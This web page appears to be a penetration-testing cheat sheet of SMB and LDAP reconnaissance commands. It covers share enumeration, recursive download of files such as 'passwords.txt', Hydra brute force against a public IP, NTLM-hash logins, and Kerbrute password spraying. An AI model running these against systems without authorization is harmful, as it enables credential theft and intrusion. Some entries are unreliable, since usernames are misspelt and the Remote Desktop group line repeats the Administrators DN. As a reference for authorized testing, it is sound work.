pwny.cc
Search…
External Recon

SMB

Ports: 137 (UDP), 139, 445.

Basic SMB enumeration

1
#Enum4linux
2
enum4linux -a 10.10.10.19 #Without User
3
enum4linux -a 10.10.10.19 -u Administrator -p Pass123 #Having user
4
5
#Rpcclient
6
rpcclient -U "" -N 10.10.10.19 #No creds
7
rpcclient -U Administrator 10.10.10.19 #Asks for password
8
rpcclient -U Administrator --pw-nt-hash 10.10.10.19 #Asks for NTLM hash
9
10
#Nmap
11
nmap --script smb-enum-users.nse -p139,445 -Pn 10.10.10.19 #Enum SMB users
12
nmap --script smb-enum-shares.nse -p139,445 -Pn 10.10.10.19 #Enum SMB shares
Copied!

List shared folders

1
#Smbclient
2
smbclient --no-pass -L //10.10.10.19 # Null user
3
smbclient -U Administrator -L [--pw-nt-hash] //10.10.10.19 #With --pw-nt-hash, the pwd provided is the NTLM hash
4
5
#Smbmap
6
smbmap -u "Administrator" -p "Pass123" -H 10.10.10.19 #Also works with NTLM hash
7
8
#Crackmapexec
9
crackmapexec smb 10.10.10.19 -u '' -p '' --shares #Null user
10
crackmapexec smb 10.10.10.19 -u 'Adminisatrator' -p 'Pass123' --shares
Copied!

Connect/mount shared folders

1
#Connect
2
smbclient -U Administrator [--pw-nt-hash] //10.10.10.19 #With --pw-nt-hash, the pwd provided is the NTLM hash
3
4
#Mount
5
mount -t cifs -o username=user,password=password //10.10.10.19/share /mnt/share
Copied!

Download files from shared folders

1
#Smbmap
2
smbmap -R Folder -H 10.10.10.19 -A "passwords.txt" -q #Search file in recursive mode and download it
3
4
#Smbget
5
smbget smb://10.10.10.19/Disk$ -R -U "Administrador" #Download all files recursively
6
7
#Smbclient
8
smbclient //10.10.10.19/Disk$
9
> mask ""
10
> recurse
11
> prompt
12
> mget * #Download everything to current directory
Copied!

Bruteforce on SMB

1
#Hydra
2
hydra -L users.txt -P password.txt 178.255.196.56 smb -V -t 100
3
4
#Smbrute (https://github.com/m4ll0k/SMBrute)
5
python3 smbrute.py -h 10.10.10.19 -U users.txt -P passwords.txt
Copied!

LDAP

Ports: 389, 636 (SSL), 3268, 3269 (SSL).

Basic LDAP enumeration

1
#Windapsearch (https://github.com/ropnop/windapsearch)
2
python windapsearch.py -u Administrator -p Pass123 -d dev.corp --dc-ip 10.10.10.19
3
4
#Ad-ldap-enum (https://github.com/CroweCybersecurity/ad-ldap-enum)
5
python ad-ldap-enum.py -d dev.corp -l 10.10.10.19 -u Administrator -p Pass123
Copied!

Bruteforce on LDAP

1
#Password spray (https://github.com/dafthack/DomainPasswordSpray)
2
Import-Module .\DomainPasswordSpray.ps1
3
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
4
5
#Kerbrute (https://github.com/ropnop/kerbrute)
6
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 10.10.10.19 rockyou.txt Administrator #Password brute
7
./kerbrute_linux_amd64 userenum -d evil.corp --dc 10.10.10.19 users.txt #Username brute
8
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 10.10.10.19 users.txt rockyou.txt #Password spray
Copied!

ldapsearch

1
#Add one of the following options depending on what you want to do
2
ldapsearch -x -h 10.10.10.19 -D 'dev.corp\Administrator' -w 'Pass123' <OPTION>
3
4
#Extract Users
5
-b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
6
#Extract Computers
7
-b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TDL>"
8
#Extract My info
9
-b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
10
#Extract Domain Admins
11
-b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
12
#Extract Domain Users
13
-b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
14
#Extract Enterprise Admins
15
-b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
16
#Extract Administrators
17
-b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TDL>"
18
#Extract Remote Desktop Group
19
-b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TDL>"
Copied!